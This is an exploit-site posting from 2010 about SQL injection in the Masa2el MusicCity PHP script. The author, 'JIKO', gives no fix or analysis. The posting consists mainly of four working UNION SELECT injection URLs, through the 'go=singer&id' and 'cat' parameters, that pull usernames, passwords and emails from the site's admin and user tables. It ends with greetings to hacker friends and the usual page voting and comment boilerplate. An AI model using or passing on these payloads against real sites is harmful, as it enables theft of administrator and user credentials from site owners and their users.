Masa2el MusicCity multiple remote SQL injection vulnerabilities

2010.02.25

Credit: JIKO

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

----------[exploit Debut]
[ Remote SQL Injection Vulnerability]
----------[Script Info]

Moi    : JIKO
Site    : No-exploit.Com
Email    : mm :( Moghla9 Ferme Closed

----------[Script Info]

Site:http    : http://www.masa2el.com
Download    : http://www.masa2el.com/index.php?go=dl&type=d&id=4

----------[exploit Info]

>>|~[SQL]
    Admin Info :
http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--
http://localhost/Path/index.php?go=singer&id=-13 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_user--

    User Info :
http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword,0x3a,email),2,3 from masa2el_user--
http://localhost/Path/?cat=-999999999 union select 0,concat(UserName,0x3a,PasSword),2,3 from masa2el_admin--

Merci  :Allah
amis :HxH, Cyb3r-DeViL, The Sadhacker, kasper,  SkuLL-HacKeR ,  ZaIdOoHxHaCkEr ,ViRuSMaN Member No-exploit.Com,all friends

----------[exploit Fin]


________________________________
Vous cherchez l'intgrale des clips de Michael Jackson ? Bing ! Trouvez !<http://www.bing.com/videos/search?q=Michael+Jackson&FORM=MVDE6>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Masa2el MusicCity multiple remote SQL injection vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.